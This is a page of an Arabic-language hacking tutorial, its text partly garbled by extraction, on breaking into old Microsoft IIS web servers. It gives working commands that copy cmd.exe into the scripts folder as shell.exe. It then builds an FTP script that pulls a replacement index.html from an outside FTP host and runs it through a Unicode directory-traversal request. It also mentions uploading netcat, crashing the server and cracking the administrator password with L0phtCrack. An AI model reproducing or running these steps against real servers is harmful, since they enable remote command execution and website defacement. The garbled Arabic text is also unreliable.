‫‪ o‬الن يتم طلب الصفحة من ختلل المتصفح ‪http://www.xxxx.com/test.shtml‬‬                 ‫‪-3‬‬
                                                      ‫‪ o‬الن سوف تصظهر لك الصفحة ‪.‬‬
                                                                                                 ‫‪-4‬‬
                           ‫‪ o‬الن تصستطيع الكتابه وتصم تصخطي مشكلة الـ ‪. Access Denied‬‬            ‫‪-5‬‬
     ‫‪ o‬اذا ظهرت لك صفحة الخطاء رقم ‪ 500‬فمعناها انك لم تصقم بتطبيق الطريقة بالشكل‬

                                                    ‫الصحيح وعليك اعادة المحاولة ‪.‬‬
‫الطريقة الثالثة باستخدا‪.‬م برنامج ‪ NC.exe‬بحيث يتم عمل اب لوود لهذا الملف داختل مجلد الـ ‪Temp‬‬
‫في دليل الويندوز ومنه يتم تصنفيذ الوامر من ختلل موجهة الدوز وللمعلومية مجلد الـ ‪ Temp‬مفتو ح‬

                                                                         ‫لعمليات الب لوود ‪.‬‬
‫الطريقة الرابعة وهي من ختلل عمل كراش للسيرفر باستخدا‪.‬م البرامج اللزمة لهذا الغرض وهذه‬

                                                    ‫الطريقة غير مجديه في كثير من الحيان ‪.‬‬
        ‫البحث عن ملفات ‪ root.exe ، sensepost.exe ، shell.exe ، w3svc.exe :‬ونسخها الى مجلد‬

                                                 ‫‪ c:\inetpub\scripts‬وتصطبيق الثغرة من ختللها ‪.‬‬

                                               ‫‪ -‬كيفية عمل اكاونت للدختول بواسطة الـ ‪. FTP‬‬

        ‫‪ -1‬نبسخ ملف ‪ CMD‬الى مجلد ‪ Scripts‬باسم ‪ Shell.exe‬حتى يتم الاستفاد ة من ثغر ة قديمة‬
‫‪c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\shell.exe/‬‬

‫‪ -2‬انبشاء ملف ‪ mspft.pll‬بواسطة الامر ‪ Echo‬وكتابة فيه التالي ‪ open ftp.host.com‬حيث‬

‫‪c+echo+open+ftp.host.com+>+c:\winnt\mspft.ppl/‬‬            ‫ان هذا هو الخاد م للـ ‪. FTP‬‬

‫‪ -3‬الن مطلوب اضافة مجهول ‪ Anonymous‬الى نفس الملف الذي قمنا بانشاءه ‪mspft.pll‬‬
‫‪shell.exe?/c+echo+anonymous+>>+c:\winnt\mspft.ppl/‬‬

        ‫‪ -4‬الان مطلوب ادراج البريد ‪ hExRay@Hotmail.Com‬الى نفس الملف الذي قمنا بانشاءه‬

‫‪shell.exe?/c+echo+hEx@Hotmail.Com+>>+c:\winnt\mspft.ppl/‬‬         ‫‪mspft.pll‬‬

                     ‫‪ -5‬إضافة ‪ User‬قبل ‪ Anonymous‬لزو‪.‬م الملف الذي قمنا بانشاءه ‪mspft.pll‬‬
‫‪shell.exe?/c+echo+user+anonymous+>>+c:\winnt\mspft.ppl/‬‬

‫‪shell.exe?/c+echo+hEx@Hotmail.Com+>>+c:\winnt\mspft.ppl/‬‬        ‫‪ -6‬الن تصكرار لحاجهة العداد‬

                     ‫يتم هنا ادراج الموقع الحالي للملفات‬                                         ‫‪.g‬‬
‫‪shell.exe?/c+echo+lcd+c:\inetpub\wwwroot+>>+c:\winnt\mspft.ppl/‬‬

‫‪ -8‬الن يكتب اوامر الـ ‪ FTP‬اللزمة لسحب الملف من ختاد‪.‬م الـ ‪ FTP‬وهي ‪ Get index.htm‬ثم يدرج هنا‬

‫‪shell.exe?/c+echo+get+index.html+>>+c:\winnt\mspft.ppl/‬‬          ‫بدون المسج السابق‬

‫‪shell.exe?/c+echo+quit+>>+c:\winnt\mspft.ppl/‬‬             ‫‪ -9‬هنا نفس السابق ولكن باضافة ‪Quit‬‬

        ‫‪ -10‬الن يتم تصنفيذ امر ‪ ”FTP.exe?+"-s:c:winnt\mspft.ppl‬وهو عبارة عن ختطوات قمنا بانشاءها‬

‫‪Open FTP.host.com -‬‬  ‫وموجهودة في ملف ‪ mspft.ppl‬باحتوائها على مايلي ‪-:‬‬

‫‪Anonymous -‬‬

‫‪hEx@Hotmail.Com -‬‬

‫‪User Anonymous -‬‬

‫‪hEx@Hotmail.Com -‬‬

‫‪Get index.html -‬‬

‫‪Quit -‬‬

‫‪"msadc/..%c0%af../..%c0%af../winnt/system32/ftp.exe?+"-s:c:\winnt\mspft.ppl/‬‬

                                                     ‫‪ -‬طريقة كشف باسورد الدمينستريتور ‪.‬‬
‫نحتاج الى وجهود برنامجين ) ‪ ( Microsoft Access – L0phtCrack‬وهي لزو‪.‬م تصنفيذ بعض‬

                                                                          ‫الخطوات لتالية وهي ‪-:‬‬

                     ‫‪131‬‬